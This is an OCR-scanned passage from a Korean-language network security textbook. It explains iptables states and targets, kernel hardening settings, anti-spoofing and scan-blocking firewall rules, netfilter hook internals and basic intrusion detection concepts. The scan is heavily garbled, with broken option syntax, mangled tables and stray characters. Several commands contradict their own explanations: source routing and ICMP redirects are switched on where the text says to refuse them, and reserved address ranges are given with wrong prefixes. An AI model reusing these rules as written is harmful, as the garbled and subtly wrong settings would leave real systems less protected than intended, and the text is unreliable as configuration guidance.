적이 가능하다. NEW 는 새롭게 련결을 시작하거나 이전의 련결추적표에 보이지 않는 파 
케 트를 의 미 한다. tcp 의 경 우 련결 을 맺 기 위 한 정 상적 인 syn 파케 트가 여 기 에 해 당한다. 

ESTABLISHED 는 이미 련결되여 있는 상태를 의미 하며 련결이 맺어진 이후의 tcp ack 
통보나 이미 자료가 오고간 udp 또는 icmp echo-request 에 대 한 icmp echo-reply 통보가 
이에 해당된다. RELATED 는 새롭게 련결을 시작하려고 하나 이미 련결추적표에 관련있 


는 ESTABLISHED 표가 있는 경 우를 말한다. 주로 ICMP 오유가 여 기 에 속하며 active ftp 
접속시 사용하는 두번째 포구인 ftp-data (tcp 20 번) 가 대표적인 경우이다 . 마지막으로 
INVALID 는 련결상태를 알수 없거나 잘못된 머리부를 가지고있는 경우를 말한다： 
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icmp echo - request 를 보낸적이 없는데 icmp echo - reply 통보를 수신하는 경우가 여기에 해 
당한다. 

또한 상태추적 에서 syn 파케 트와 NEW 를 혼돈하지 말아야 한다. 아래 의 실례 는 들어 
오는 tcp 파케트가운데서 syn 파케트가 아니면서 련결추적표에는 처음보는 파케트를 의미한 
다. 련결추적표에 처음 보이는 tcp 파케트라면 syn 파케트 이외에는 없을것이다. 따라서 우 
의 규칙에 정합되는 파케트는 분명 위조된 파케트나 비정상적 인 파케트일것 이 다. 

#iptables -A INPUT -p TCP ! — syn _m state —state NEW 

② 목표확장 

목표확장은 핵 심부 모둘로 구성되는데 iptables 에 대 한 선택적 확장은 새 로운 명 령의 옵 
션 을 제 공하게 된 다 . 

^ LOG 확장 

LOG 확장은 일 치 하는 파케트의 핵 심부 로그를 제 공해 준다. 표 3-19 는 LOG 확장에 쓰 
이 는 옵션들이 다. 


표 3-19. LOG 확장에 쓰이는 옵션 


옵션 

기 능 

-- log-level 

준위수자나 이 름을 설정한다. 준위 이 름은 info , notice , warning , err , 
crit , alert , emerg 이고 매개는 준위수자 0에서 7까지의 수자와 같다. 

— log-prefix 

기 록통보의 시 작부분으로 보내 려 는 통보를 설 정한다. 최 대 14까지 설 
정할수 있 다. 


정 합되는 파케트를 LOG 목표로 보내면 파케트의 IP 주소 및 기 타 유용한 정 보를 기 록 
에 남기며 이 정보는 dmesg 등의 명령이나 / var / log / message 파일에서 확인할수 있다. 이 
기능은 주로 규칙을 검사하려고 할 때 자주 사용된다. 실례로 규칙 이 제대로 동작하는지 100% 
확인할수 없을 때에는 DROP 대신에 LOG 를 사용하여 검사해볼수 있다. LOG 에서 주로 사 
용하는 옵션은 - log - level 과 一 log - prefix 가 있는데 一 log - level 에서는 syslogd 에서 제공하 
는것 처 럼 debug , info , notice , warning , warn , err , error , crit , alert , emerg 그리 고 panic 
등을 리용하여 어떠한 기록준위를 사용할것인지를 지정할수 있다. 

LOG 확장은 limit 목표 다음에 사용할 때 가장 효과적 이 다. 

⑤ REJECT 확장 

REJECT 모둘은 DROP 와 같은 기 능을 수행한다. 다른점 은 ipchains 에 서 사용한 방책 
들중에 서 DENY 와 같이 파케 트의 오유통보를 ICMP 로 전송한다는것 과 특정한 상황에 서 
는 ICMP 로 전송하지 않는것이다. REJECT 확장은 하나의 옵션을 가지는데 그것은 - 
이것은 응답파케 트를 변경하려 고 할 때 사용한다. 표 3-20 은 REJECT 
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확장에서 ICMP 로 전송하지 않는 상황을 나타낸다. 

REJECT 를 할때 에 는 icmp 류형 을 함께 지 정 할수 있 는데 icmp - net - unreachable ， 
icmp - host - unrechable ， icmp - port - unrechable ， icmp - proto - unrechable ， 

icmp - net-prohibited 또는 icmp - net-prohibited 등의 icmp 류형 을 지 정 할수 있 는데 별 도 
로 지 정하지 않을 경 우 기 본적 인 오유통보는 icmp - port - unrechable 이 된 다. 

그러면 파케트를 DROP 하겠는가 아니면 REJECT 하겠는가 ? 

결론적 으로 보면 DROP 하는것 이 좋다. 왜 냐하면 REJECT 를 할 경 우에는 거부되는 파 
케트에 대해 일일이 거부되였다는 응답을 보내주어야 하기때문에 필요없는 망통과량을 증 
가시키 고 요청 할 때 마다 응답한다면 동시 에 많은 요청 을 그만큼 응답하여 야 하기 때 문에 이 
것은 봉사거부공격으로 악용될수 있는 가능성도 있기때문이다. 또한 비록 오유통보라고 할 
지라도 응답은 그 자체가 공격자에게 유용한 정보가 될수 있기때문에 DROP 하는것이 좋 
다. 그러 나 반드시 모든 봉사에 대해 DROP 하여 야 하는것은 아니 다. 

왜 냐하면 DROP 할 경 우에 는 봉사기쪽에 서 파케 트를 거 부한 후에 도 추가적 인 아무런 통 
보를 보내지 않기때 문에 동보을 받지 못하는 송신자쪽에서는 련결시 도가 시 간초과 ( timeout ) 
가 될 때까지 기 다려 야 하므로 속도저 하의 원인이 될수 있기때문이 다 . 그 대표적 인것 이 tcp 
113번을 사용하는 identd 봉사이 다. idnetd 는 대부분 보안을 위 하여 봉사를 하지 않지 만 특 
정 한 응용프로그람에 서 는 시 간초과가 될 때 까지 기 다린 후 다음 프로쎄 스가 수행 되 기 때 문 
에 상당한 속도저하가 생기게 되므로 이때에는 REJECT 로 바로 응답하도록 하는것이 좋다. 


표 3-20. REJECT 확장에서 ICMP 로 전송하지 않는 경우 



상 황 

1 

검사된 파케트가 ICMP 통보일 경우，또는 알수 없는 ICMP 형태일 경우 

2 

검사된 파케트가 머리부가 없는 조각인 경우 

3 

많은 ICMP 오유가 보내진 목적지로 오유를 전송할 경우 


이외에도 RETURN 과 QUEUE 목표도 있다. 

RETURN 의 기능은 한 사슬의 끝으로 보내는것과 같은 효과를 낸다. 즉 미 리 만들어 
진 사슬인 경 우에는 그 사슬의 방책 은 실행된다. 반면에 사용자에 의해서 만들어 진 사슬 
의 경우에는 - j 규칙 바로 이전의 사슬로 이동한다. 

QUEUE 의 기 능은 파케트를 대 기시키 는것 이 다. 이것은 사용자의 작업 을 위 해서 이 다. 
그러 나 이 파케트에 해 당한 규칙 이 없다면 DROP 된다. 
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一 iptables 활용 

규칙을 설정할 때의 몇가지 주의점 

파케트러 과규칙 은 핵 심 부표에 보관되 므로 재 기동하면 초기 화되 므로 재 기동후에 도 적 
용하려 면 기 동각본에 서 실 행 하도록 하여 야 한다. 

따라서 아래 서 설 명하는 규칙 을 정 리 한 각본을 / etc / rc . d / rc . local 등에 서 실 행하도 
륵 하면 된다. 

규칙은 규칙을 입 력 한 순서대로 INPUT , OUTPUT 등의 사슬의 끝에 추가된다. 외 
부에 서 방화벽 내 부로 들어오는 파케 트는 INPUT 사슬에 선 언된 규칙 대 로 방화벽 내 부에 서 외 
부에로 나가는 파케트는 OUTPUT 사슬에 선언된 순서대로 정합여부를 판단하여 정합이 될 
때까지 순서대 로 비 교를 하여 정 합이 되면 정 합된 목표에 따라 ACCEPT 나 DROP 등의 적 
용을 하고 더 이상 정 합시도를 하지 않는다. 

만약 끝까지 정 합되는 규칙 이 없을 때 에는 - P 추가선택 으로 지정한 기 본방책으로 지 
정 한 규칙 을 따른다. 따라서 먼저 선 언한 규칙 에 적 용되 면 그다음의 규칙 은 검 사를 하지 않 
으므로 규칙 지 정 순서가 매 우 중요하다. 

망구조가 복잡하면 복잡할수록 규칙각본도 복잡해 진다. 따라서 일일히 말단에서 입 력 
하지 말고 쉘 각본으로 작성한 후 수정하거 나 실 행한다. 

이 제 부터 실제 방화벽봉사를 구축할수 있도륵 응용해보자. 봉사기 에 방화벽 을 함께 사 
용하는 형 태를 례 를 들어보자. 

핵심부파라메터수정 

방화벽 을 초기 화하기 앞서 핵 심 부파라메 터 를 수정해서 별도의 핵 심 부관리 기 능을 사용 
하도록 하는것이 좋다. 

아래 에서 설명하는 설정 은 득 방화벽 을 사용하지 않아도 설정해 놓으면 좋다. 

^ 방송에 응답거부하기 

broadcast 나 multicast 주소로 향하는 icmp echo request 파케트를 거부한다. 

echo “ 1 ” > / proc / sys / net / ipv 4 / icmp _ echo _ ignore_broadcasts 

^ 원천경로지정파케트거부하기 

원천경 로지정을 허 용할 경우 임의 로 경 로기의 경 로를 수정할수 있으므로 원천경 로지 
정 을 허 용하면 안된 다. for 문을 리용하여 모든 대 면부에 적 용하고있 다. 

for interface in / proc / sys / net / ipv 4 / conf /*/ accept _ source_route ； do 

echo “ 1 ” > $ interface 

^ tcp syncookies 기능설정 

tc & syncookies 는 SYN Flooding 공격 에 유연하게 대 응한다. 

위 해 syncookies 를 설 정 하는것 이 좋으며 핵 심 부에 서 먼 저 지원되 여 야 한다. 
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echo “ 1 ” >/ proc / sys / net / ipv 4 / tcp_syncookies 

n ICMP redirect 허용하지 않기 

icmp redirect 는 경 로기 가 호스트에 더 짧은 경 로가 있 다고 알려줄 때 사용된 다. 

역 시 for 문을 리용하여 모든 대 면부에 적 용할수 있다. 

for interface in / proc / sys / net / ipv 4 / conf /*/ accept_redirevts ； do 

echo “ 1 ” > $ interface 

^ 속이기방지 설정하기 

이 설정은 자신의 망이 속이기공격의 원천으로 쓰이는것을 차단한다. 

모든 대 면부에 서 들어오는 파케 트에 대 하여 회 답하여 들어오는 대 면부로 나가지 못하 
게 파케트를 거부한다. 

for interface in / proc / sys / net / ipv 4 / conf /*/ rp_filter ； do 
echo “ 1 ” > $ interface 

cr 비 정 상적 인 파케트기륵 남기 기 

기만된 파케트나 원천경로지정， Redirect 파케트에 대해 기록파일에 정보를 기록한다. 
log_martians 는 단지 비정상적인 파케트에 대해 기록만 남길 뿐 유효성에 영향을 주지 않 
는다. 

for interface in / proc / sys / net / ipv 4 / conf /*/ log_martians ； do 
echo “ 1 ” > $ interface 

이 미 존재하는 규칙 삭제 하기 

려 과규칙 모임 을 새 롭게 정 의 할 때 제 일 먼저 하여 야 할것 은 이 미 존재 할지 도 모르는 규 
칙 을 모두 삭제하는것 이 다. 만약 새 로운 규칙 을 적 용하기 전에 이 미 존재하는 규칙 이 있 
을 경우 기존의 규칙끝에 추가되기때문에 문제가 될수 있다. 이렇게 모든 규칙을 한끼번 
에 삭제 하는것 을 씻 어 내 기 ( flushing ) 한다고 하며 특정 한 사슬을 지 정 하지 않을 경 우에 는 모 
든 표의 규칙을 동시 에 초기화한다. 

iptables -F 
iptables -t nat -F 
iptables -t mangle -F 
Loopback 통신 허 용하기 

망관련봉사를 제공할 경우 loopback 통신은 매우 중요하다. loopback 대면부는 가상의 
내부대면부이므로 loopback 와 관련된 모든 통신을 허용하여야 한다. 현재 자신의 체계에 
서 loopback 가 사용되는지 알아보려면 tcpdump -i lo 로 확인한다. 

iptables -A INPUT -i lo -j ACCEPT 
iptables -A OUTPUT -o lo -j ACCEPT 
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기 본방책 (Default Policy ) 설 정 하기 

방화벽 의 방책 은 크게 두가지 로 나눌수 있 다. 하나는 모두 거 부하고 득정 한 봉사만 허 
용하는 방법 이 며 또 다른 하나는 모두 허 용하고 특정한 봉사만 거 부하는 방법 이 있 다. 기 
본방책 은 방화벽 을 도입할 기 관이 나 봉사기 의 보안방책 에 따라 다르겠지 만 대 부분 첫 번째 
방법 을 사용하며 이 방법 이 더 욱 안전하다. 기 본방책 은 앞에서 설명한바와 같이 Default 
Policy 의 의미로 -묘로 표현하며 ACCEPT , DROP 중의 하나이 다. (기본방책으로 REJECT 
는 사용하지 않는다). 

iptables -P INPUT DROP 

iptables -P FORWARD DROP 

iptables -P OUTPUT DROP 

iptables -t nat _P PREROUTING DROP 

iptables -t nat _P OUTPUT DROP 

iptables -t nat -P POSTROUTING DROP 

iptables -t mangle _P PREROUTING DROP 

iptables -t mangle ~P OUTPUT DROP 

비 정상적인 tcp-flags 차단하기 

iptables -A INPUT -p TCP - tcp-flags ALL NONE -j DROP 
iptables -A INPUT -p TCP - tcp-flags SYN , FIN SYN , FIN -j DROP 
iptables -A INPUT -p TCP - tcp-flags SYN,RST SYN,RST -j DROP 
iptables -A INPUT -p TCP - tcp-flags FIN , RST FIN,RST -j DROP 
iptables -A INPUT -p TCP - tcp-flags SYN , RST SYN , RST -j DROP 
iptables -A INPUT -p TCP - tcp-flags ACK , FIN FIN -j DROP 
iptables -A INPUT -p TCP - tcp-flags ACK , PSH PSH -j DROP 
iptables -A INPUT -p TCP - tcp-flags ACK,URG URG -j DROP 

우와 같이 설정 하면 주로 훑기 를 차단할 때 유용하다. 두번째 규칙 을 례 로 들어 보면 tcp 
파케 트에서 SYN , FIN 부분을 살펴보고 SYN 과 FIN 이 모두 설정되 여있는 경 우에 는 거 부 
한다는 의미이다. SYN 파케트는 접속을 시작하는 tcp-flag 이고 FIN 은 접속을 끝내는 
tcp-flag 인데 이 와 같이 한 파케 트에서 SYN 과 FIN 비 트가 함께 지정되 여있는것은 정상적 
인 파케트에서는 있을수 없는 비정상적인것이다. 마찬가지로 ACK 와 FIN 비트를 살펴보 
아 ACK 비트없이 FIN 비트만 설정되여있는 경우도 비정상적인 파케트이므로 거부하고있다. 
우에서 언급한 7가지 경우는 모두 비정상적 인 tcp-flags 조합이므로 려과하는것 이 좋다. 
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상태추적 허용하기 

이미 려과규칙에 따라 허용이 된 통신인 경우 뒤이어 전송되는 모든 파케트를 다시 첫 
번째 규칙부터 검사할 필요없이 상태추적을 리용하면 이미 허용이 되여 련결된 통신은 다 
시 확인함이 없이 허용할수 있다. 이것이 바로 상태추적의 가장 큰 장점중의 하나이다. 아 
래 두줄을 규칙 설정 의 앞쪽에 선언함으로써 일정하게 기 능을 향상시 킬수 있 다. OUTPUT 
의 기본방책 이 DROP 일때는 아래와 같이 INPUT , OUTPUT 가 모두 허용되여 야 하지만 
OUTPUT 의 기본방책 이 ACCEPT 일 때는 INPUT 만 허용하면 된다. 

Iptables A INPUT -m state —state ESTABLISHED , RELATED -j ACCEPT 
Iptables A OUTPUT -m state -state ESTABLISHED , RELATED -j ACCEPT 

원천주소로 려과하기 

다음은 원천주소나 목적 지 주소로 려 과하는 방법 을 보자. 일 반상태 에서 존재할수 없는 
비 정 상적 인 원천 IP 를 려 과하여 IP 주소를 위 조하는 DoS 공격 등에 대 비할수 있 다. 

^ 방화벽자신을 원천으로 하는 IP 

인터네트에 련결된 외부대면부를 통해 방화벽에 할당된 공인 IP 를 원천주소로 해서 방 
화벽으로 들어오는 통신은 위조된 통신이다. 따라서 이러한 통신은 차단하여야 한다. 

iptables -A INPUT _s $ IP_ADDR -j DROP 

③ 사설 ip 주소 

IANA ( http :// www . iana.org 八 에 서 특별 한 목적 으로 사용하기 위 해 예 약해 둔 IP 대 
역이 있다. 이리한 IP 는 특별한 목적으로 사용될뿐 인터네트에서는 경로기로 될수 없기 
때문에 이 러한 IP 주소를 원천으로 하는 동신은 위조된 동신이 다. 

iptables -A INPUT -i ethO _s 10.0.0.0/8 -j DROP 
A 급 사설 IP 대역을 원천주소로 하는 파케트를 거부한다. 
iptables -A INPUT _i ethO _s 172.16.0.0/16 -j DROP 
B 급 사설 IP 대역을 원천주소로 하는 파케트를 거부한다. 
iptables -A INPUT _i ethO -s 192.168.0.0/16 -j DROP 
C 급 사설 IP 대역을 원천주소로 하는 파케트를 거부한다. 
iptables -A INPUT _i ethO _s 224.16.0.0/16 -j DROP 
D 급 MULTICAST 대역을 원천주소로 하는 파케트를 거부한다. 
iptables -A INPUT _i ethO _s 172.16.0.0/16 -j DROP 
예약된 E 급대역을 원천주소로 하는 파케트를 거부한다. 
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^ loopback IP 주소 

loopback IP 주소는 내부의 loopback 대면부 ( lo ) 를 통해서 만 통신하기 때문에 loopback 
주소를 원천으로 하여 외부망을 통해 들어오는 통신은 위조된 통신이다. 
loopback IP 주소대역을 원천으로 하는 파케트를 거부한다. 
iptables -A INPUT _i ethO _s 127.0.0.0/8 -j DROP 

^ 기타 예약된 IP 대역을 거부한다. 

아래의 규칙에서 0.0. 0.0/8 과 248. 0.0. 0/5는 예약된 IP 대역이며 169.254.0.0/16 
은 DHCP 등에서 IP 를 할당하기전에 림시로 사용하는 련결국부망 (Link Local Network ) 
이 며 192. 0.2. 0/24는 TEST-NET 대 역 이다. 

iptables -A INPUT -i ethO _s 0.0.0.0/8 _j DROP 

iptables -A INPUT _i ethO _s 248.0.0.0/5 -j DROP 

iptables -A INPUT _i ethO _s 169.254.0.0/16 -j DROP 

iptables -A INPUT _i ethO _s 192.0.2.0/24 -j DROP 

iptables 규칙 을 리용한 파케트러 과기 능을 도식 적 으로 보면 그림 3-16 과 같다. 
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자 

료 


IP 파케트 



그림 3-16. 파케트려과의 동작원리 


iptables 와 ipchains 의 차이점 

첫째로，기본사슬의 이름이 소문자에서 대문자로 바귀였다. 

둘째 로， ’- i ’ 옵션은 들어 오는 대 면부만 의 미 하고 INPUT 와 FORWARD 사슬에 서 만 동 
작한마/ FORWARD 나 OUTPUT 사슬에 사용되였던 ’_ i ’ 는 ’- o ’ 로 바귀였다. 
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셋째로， TCP 와 UDP 포구는 一 source-port 또는 一 sport (또는 一 destination-port / 
— dport ) 옵션과 함께 사용되 여 야 하며 ’ _ p tcp ’ 또는 ’_p udp ’ 옵션과 함께 사용되 여 야 
한다. 그러면 이것은 TCP 또는 UDP 확장을 각각 적재 할것 이 다. ( ipt_tcp 와 ipt_udp 모둘 
을 수동으로 적재하기 위해서 포함시킬수도 있다.) 

넷째 로， TCP -y 지 시 자는 一 syn 으로 바뀌 였 고 -p tcp ’ 다음에 와야 한다. 

다섯째로， DENY 는 DROP 로 바귀였다. 

여섯째로， REJECT 와 LOG 는 확장된 목표이다. 즉 이것들은 독립된 핵심부모둘이 라 
는 의미 이 다. 

일곱째로，사슬이름은 16자까지 가능하다. 

여덟째로， MASQ 와 REDIRECT 는 더이상 목표가 아니다. REJECT 와 LOG 는 확장 
된 목표이다. 즉 이것들은 독립된 핵심부모둘이다. 

지금까지 응용층준위에서 방화벽설정방식에 대해서 고찰하였다. 

실제 로 iptables 에서 설정한 방화벽규칙 구조를 접 수하여 IP 준위 에 서 파케 트러 과동작 
을 수행하는 기 능은 netfilter 라는 핵 심 부모둘이 수행한다. 

3) netfilter 에 의한 핵 심 부준위 방화벽실 현구조 

netfilter 는 iptables 에 서 지 정 한 규칙 구조를 접 수하여 핵 심 부준위 에 서 이 를 실 현 하는 핵 
심 부모둘이다. 

netfilter 는 LINUX 망구조의 TCP/IP 실현 방식 에 서 장치층과 IP 층사이 에 삽입 되 여 방 
화벽을 실현하는 핵심부망구조실현의 직렬삽입 구조이 다. 

netfilter 는 후크점등록에 등록된 후크함수의 련속적 인 집행과정으로 실현되여있다. 

그러 면 netfilter 의 기 본흐름과정 에 대 해서 고찰해 보자. 

— > [1] - >[ R 0 UTE ]— > [ 3 ] -> [4] -> 

■ | - 
I I 

I [ ROUTE ] 

v I 

[2] [5] 

I A 

I 1 

V I 

그림 3-1 7. net 社 Iter 의 기본흐 _ 

파케트는 그림 3-17 의 좌측으로부터 들어와서 자료검사단계를 거친 후 netfiltei •의 
IP _ PRE _ R 0 UTING [1] 후크점 으로 전달된다. 다음 파케 트는 경 로조종처 리 로 넘 •며 여 
기서 파케트가 다른 망대면장치 로 넘 어 가는가 혹은 자기 에게 들어오는가가 결정 ^/^ f 
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케 드가 경 로조종될수 없는 경 우 파케 드는 무시 된다. 만일 파케 드의 목적 지 가 자기 체 계 라 
면 NF_IP_LOCAL_IN [2] 후크점 이 호출되게 된다. 만일 다른 망대면장치로 전달하려고 
한다면 NF_IP_FORWARD [3] 후크점이 호출된다. 다음 파케트를 다른 호스트로 보내지 
기전에 마지막 후크점 인 NF_IP_POST_ROUTING [4] 이 호출된다.자기 체계 에서 생성 
된 파케 트에 대 해서 는 NF_IP_LOCAL_OUT [5] 후크점 이 호출된 다. 이 때 이 후크점 이 호 
출된후 경로조종처리가 진행된다. 

netfilter 는 파케트흐름에 대 해서 다음의 5 가지 동작을 수행 할수 있다. 

^ NF_ACCEPT： 파케트를 그대로 통과시킨다. 

^ NF_DROP： 파케트를 거부한다. 

^ NF_STOLEN： 파케 트를 접 수하지 만 웃층으로 통과시 키 지 않는다. 

여 NF_QUEUE： 파케트를 대기렬로 보낸다. (이것은 보통 사용자 공간에서의 처리를 
목적으로 한다.) 

여 NF_REPEAT： 현재 후크함수를 다시 호출한다. 

一 후크구조체의 정의 


struct nf _ hook_ops 

{ 

struct list_head list ； /* 후크함수 련결 목록 지적자 */ 

nf_hookfn *hook ； /* 후크함수 지적자 */ 

int pf； /* 통신규약 계렬 번호 */ 

int hooknum ； /* 후크점 번 호 */ 

int priority； /* 후크우선도 */ 

후크함수는 이 우선도 값에 따라서 감소하는 순서로 등록 된다 . 


一 후크함수의 원형정의 


typedef unsigned int nf_hookfn ( 

unsigned int hooknum, /* 후크점번 호 */ 
struct sk_bu 伴 **skb, /* sk_bu 伴 자료완충기 */ 
const struct net_device *in, /* 입구대 면장치지적 자 */ 
const struct net_device *out, /* 출구대 면장치지적 자 */ 
int (*okfn) (struct sk_bu 伴 *) /* 등록된 후크함수를 집 행 하고 실행 할 함 
수지 적 자 */ 

(현재 LINUX 에서는 이 함수의 지 적자로서 ip_rcv_finish 함수가 지 적되 고있다. ) 

)； 
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一 후크점의 등록 및 해제 

후크점은 후크우선도에 따라서 우선도값이 작은 순서로 련결목록의 선두에 삽입된다. 

후크점등록함수 _ 

int nf _ register_hook (struct nf _ hook_ops * reg ) ； 

{ 

struct list_head * i ; 

br _ write _ lock_bh ( BR _ NETPROTO _ LOCK ) ； 

for (i = nf_hooks [ reg -> pf ] [ reg -> hooknum ]. next ； 
i ! = & nf_hooks [ reg -> pf ] [ reg -> hooknum ] ； 
i = i ~> next ) { 

if ( reg->priority < ((struct nf _ hook_ops *) i )-> priority ) 
break ； 

} 

/* 후크련결목록을 탐색하여 후크우선도값에 따라서 
현재 삽입하려 는 후크점 의 삽입 위 치 를 찾는다 */ 

list_add (& reg -> list , i -> prev ) ； 

/* 찾은 위치에 후크점을 선두로 삽입한다. */ 
br _ write _ unlock_bh ( BR _ NETPROTO _ LOCK ) ; 
return 0； 


투크점 등록해제함수 _ 

void nf _ unregister_hook (struct nf _ hook_ops * reg ) ； 

{ 

br _ write _ lock_bh ( BR _ NETPROTO _ LOCK ) ； 
list_del (& reg -> list ) ； 

/* 후크점을 후크련결목록에서 삭제한다. */ 
br _ write _ unlock_bh ( BR _ NETPROTO _ LOCK ) ； 

} 

후크련결목록정의 

struct list_head nf_hooks [ NPROTO ] [ NF _ MAX _ HOOKS ] : 


NPROTO 는 핵 심 부에 서 지 원하는 가능한 통신규약의 개 수를 지 정한다. 최 대 값은 32 
로 정의 되여 있 다. 

NF _ MAX _ HOOKS 는 매 통신규약마다 가능한 후크점 의 개 수를 지 정 한다. 최 대 값은 8 
로 정의되여있다. 
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현재의 핵심부에서 제공하는 INET 통신규약계렬의 후크점들 

현재 고찰하는 통신규약 계 렬은 INET 이 다. 즉 TCP/IP 를 지 원하는 인터네 트통신규 
약을 고찰한다. 

현재 LINUX 핵심부에서는 INET 통신규약 계렬 ( PF _ INET ) 에 다음의 5개의 후크 
점을 정의하고있다. 

후크구조체의 등록결과 련결되는 netfilter 후크함수들은 다음과 같다. 


① NF _ IP _ PRE_ROUTING 


함 수 

등록 및 정의 파일 

후크우선도 

Ip conntrack in 

ip conntrack standalone . c 

-200 

Fw in 

ip fw compat . c 

0 

Ip nat fn 

ip nat standalone . c 

-100 

ipt _ route_hook 

iptable _ mangle . c 

-150 


② NF _ IP _ LOCAL_IN 


함 수 

등록 및 정의 파일 

후크우선도 

ip confirm 

ip conntrack standalone . c 

(~ ou 〉〉 i))-i 

fw confirm 

ip fw compat . c 

(-0 U »1))-1 

ip nat fn 

ip nat standalone . c 

100 

ipt hook 

iptable filter 

0 

ipt _ local_hook 

iptable _ mangle . c 

-150 


③ NF _ IP_FORWARD 


함 수 

등록 및 정의 파일 

후크우선도 

fw in 

ip fw compat . c 

0 

ipt hook 

iptable filter . c 

0 

ipt _ route_hook 

iptable _ mangle . c 

-150 


④ NF _ IP _ LOCAL_OUT 


함 수 

등록 및 정의 파일 

후크우선도 

ip refrag 

ip conntr ack standalone . c 

200 

ip nat local fn 

ip nat standalone . c 

-100 

ipt local out hook 

iptable filter . c 

0 

ipt local_hook 

iptable _ mangle . c 

-150 


錢變邊 鍾變變©繼繼 


































게 3 광. LINUX 에째 땅보冬到 나련요소 


⑤ NF _ IP _ POST_ROUTING 


함수 

등록 및 정의파일 

후크우선도 

Ip refrag 

ip conntrack standalone. c 

(~0U〉〉1)) 

fw in 

ip fw compat. c 

0 

Ip nat out 

ip nat standalone. c 

100 

Ip_conntrack_in 

iptable_mangle. c 

-150 


매 후크함수의 기 능에 대 해 서 는 해 당한 원천 코드를 참고하고 여 기 서 는 이 에 대 해 서 생 
략하자. 

Netfilter 에 기 초한 방화벽흐름구조를 종합하여보면 그림 3_18 과 같다. 
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제3절.침입검출체계 

3.3.1. 침입검출체계의 개념 

침 입을 검 출하는 방법 에 대 하여 론의 하기 에 앞서 먼저 침 입 ( intrusion ) 이 란 무엇 인지 
정확하게 정의하는것 이 중요하다. 그것은 침입에 대한 정의를 통하여 그의 범위를 정확히 
설정해 야 침 입을 검출하는 방법 을 연구하는데 도움이 되 기때 문이 다. 

또한 종전의 침입검출방법들에 대해 조사해야 한다. 종전의 침입검출방법들을 조사함 
으로써 매 방법 에 대 한 우결 함을 파악하여 침 입 검 출체 계 를 구성하는데 효률적 으로 리용하 
여야 한다. 


침입의 정의 

침 입 ( intrusion ) 은 두가지 로 정 의 할수 있 다 . 

침입의 첫 번째 정의는 콤퓨터가 사용하는 자원의 완전성，기밀성 ( confidentiality ) ，리 
용성을 저해하는 일련의 행위들의 집합을 침입이라고 할수 있다. 

두번째는 콤퓨터체계의 보안방책을 파괴하는 행위를 침입이라고 할수 있다 

침 입 검 출체 계 ( Intrusk>n Detection System : IDS ) 를 리 해 하기 위 하여 여 러 명 의 망규 
약전문가가 망분석 기 를 가지 고 망자료흐름을 감시 하고있다고 생 각하자. 이 전문가들은 공 
격 자가 공격 을 시 도하는 전 과정 을 살피 면서 어 떤 이 상한 자료흐름이 망에 발생하면 그것 
을 알아내 기 위하여 매 자료묶음을 부지 런히 검 사한다. 만일 이 상한 자료흐름을 발견하면 
그들은 인차 망관리 자에게 발견한 내용을 통보한다. 

이러한 방식으로 사람의 기술을 대신하는 침입검출체계가 확립되게 된다. IDS 는 망 
분석기와 같이 망으로 통과하는 모든 자료흐름을 장악한다. 일단 이 정보를 기 억기로부터 
읽 었다면 체계는 이미 알려 진 많은 공격모형들과 그 파케 트를 비 교한다. 실례 로 어느 한 호 
스트가 접 속완결시 도가 없 이 다른 호스트에 로 SYN 묶음들을 반복해서 보내 고있다는것 을 알 
게 되면 IDS 는 이것을 SYN 공격으로 판단하고 적절한 대응책을 취하게 된다. 성능이 높 
은 IDS 는 자기의 자료기지에 침입한 100개이상의 공격에 대처할수 있다. 

대 응작용은 현재 리용하고있는 구체적 인 IDS 체 계와 그것을 어떻게 구성했는가에 관 
계된다. 모든 IDS 체계들은 비정상적인 사건들을 관리에 기록하는 기술을 가지고있다. 
일부 체 계 들은 망관리 자가 후에 해 석할수 있도륵 새 로운 자료흐름묶음을 획 득하여 기 억 시 
킨다. 다른것들은 전자우편 또는 본문과 같은 경보를 보내도록 구성되여있다. 

많은 IDS 체계들은 련결의 량끝을 재시동함으로써 이상한 전송을 중단하게 할수도 있다. 

또한 려 과규칙 을 변경 시키 고 공격 콤퓨터 를 봉쇄 하기 위하여 방화벽 또는 경 로기 와 호 
상작용하는것들도 있다. 

IDS 는 보통 2개의 부분으로 구성된다. 


^ 수감기 : 이것은 자료흐름을 보관하고 분석하는 기능을 수행한다. 



종반: 이 조종반을 통하여 수감기를 관리하며 모든 보고기능이 실행된다. 
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침 입 검 출체 계 들은 매 우 많은 자원을 소비한다. 

개 발자들은 보통 256 MB 의 RAM 과 인 텔 300 MHz 펜 리 움 III 혹은 프로처 리 기 (또는 수 
감기 가 UNIX 에 서 가동하는 경 우에 는 RISC 방식 처 리 기 ) 를 장비 한 체 계 우에 서 수감기 를 동 
작시킬것 을 권고하고있 다. IDS 가 모든 자료흐름을 기 입 하기 때 문에 많은 디 스크공간이 자 
체 자료기지용으로 요구된다. 대략 100 MB 의 디스크공간이 보통 권고되지만 자료기지를 자 
주 지워버러지 않거나 또는 망을 통한 자료흐름이 많은 경우 총적으로는 더 많이 리용할 
것 을 계 획 하여 야 한다. 

조종반을 가동시 키 는 체 계 에 대 한 요구는 매 개 수감기 자료기 지 를 복사하는데 필 요한 디 
스크공간을 중분히 남겨 두어 야 한다는것 외 에 는 대 체 로 같다. 


1) IDS 의 정의 

IDS 는 단순한 접근조종기능을 초월하여 침입의 패런자료기지와 전문가체계를 사용하 
여 망이 나 체 계 의 사용을 실 시 간적 으로 감시 하여 침 입 을 검 줄하는 체 계 를 말한다. 

IDS 는 방화벽 과 같이 망보안체 계 의 중요한 구성 부분의 하나로서 방화벽 이 공격당하 
였을 때 이에 따르는 피해를 최소화하고 망관리자가 없을 때에도 공격에 적절히 대응할수 
있게 한다. 

침 입 검출에서 발생 한 2가지 오유는 잘못된 경보 (False alarm 혹은 False positive ) 
와 경 보실패 (No alarm 혹은 False negative ) 가 있다. 

잘못된 경보는 정상적인 행위를 하고 있음에도 불구하고 IDS 가 공격행위로 검출하여 
경 보를 발생시키 는 경 우를 말한다. 

경보실패는 공격자의 공격에도 불구하고 IDS 가 그 행위를 검출하지 못하는 경우를 말 
한다. 

2) IDS 의 우점 

첫째로 해킹방법에 기초하여 해커의 침입을 검출하므로 새로운 기술의 적용이 쉽다. 

둘째로 외부로부터의 공격 뿐만아니 라 내부에 의 한 해 킹도 차단할수 있다. 이 에 따라 기 
존 방화벽이 지원하지 못하는 ID 도용을 통한 내부공격자의 해킹도 차단할수 있다. 

셋째로 방화벽은 인증된 IP 로부터의 공격은 막을수 없지만 IDS 는 IP 에 관계없이 모 
든 파케 트에 대 해 검 사를 수행 하므로 보다 안전하다. 

